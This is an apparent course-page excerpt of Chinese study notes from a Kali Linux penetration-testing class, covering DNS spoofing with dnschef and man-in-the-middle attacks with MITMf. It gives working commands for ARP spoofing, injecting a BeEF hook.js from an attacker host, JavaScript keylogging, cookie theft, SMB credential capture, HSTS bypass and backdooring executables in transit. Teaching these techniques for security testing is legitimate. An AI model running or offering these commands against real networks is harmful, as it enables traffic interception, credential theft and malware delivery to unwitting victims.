846人加入学习
(36人评价)
Kali Linux安全测试

爆款好课 NO.1

价格 ¥ 599.00
该课程属于 武官课程 请加入后再学习

欺骗的目的是让流量重定向

DNS欺骗

前提是修改受害者的dns配置

dnschef   启动个假的dns服务器

   dnschef --fakeip=1.1.1.10 --
fakedomains=www.google.com,www.youtube.com --interface 1.1.1.2 -q

 --fakeip  欺骗的域名最终解析到的ip

 --fakedomains 欺骗的域名

 --interface 在哪个ip对应的网卡上进行欺骗,开启一个假的dns服务器

 

注入XSS

  即使没有XSS漏洞,也可以凌空向每个HTTP请求注入XSS攻击代码,一旦打手,影响范围巨大,如果中间人发生在运营商路线,及其难被发现

Mitmf 安装

 注意可能有问题

 – pip uninstall twisted
 – wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-
15.5.0.tar.bz2
 – pip install ./Twisted-15.5.0.tar.bz2

 

启动beef

 cd usr/share/beef-xss

 ./beef

mitmf 插入

 --spoof 使用欺骗

 --arp  使用arp欺骗

 -i 指定网卡

 --gateway 网关

 --target 目标

 --inject 注入

 --js-url 注入的url

 mitmf --spoof --arp -i eth0 --gateway 1.1.1.1 --target 1.1.1.2 --inject
--js-url http://1.1.1.3:3000/hook.js

--jskeylogger 键盘记录器

mitmf --spoof --arp -i eth0 --gateway 192.168.20.2 --target 192.168.20.1 --jskeylogger

--upsidedownternet 把图片转180度(开玩笑的东西)

--screen 屏幕快照(var/log/mitmf,十秒一张)

--ferretng 窃取cookie

--browserprofiler 浏览器及插件信息(看看flash java的版本,这俩漏洞多)

--smbtrap --smbauth

收集目标smb的帐号信息

--hsts

绕过 HSTS 的限制

 HTTP strict Transport Security

防止协议降级cookie窃取

安全策略通过HTTP相应头实施

限制user-agent https等

--filepwn

凌空插后门

有执行程序经过中间人的话就加入后门,并不是所有的都能插后门

[展开全文]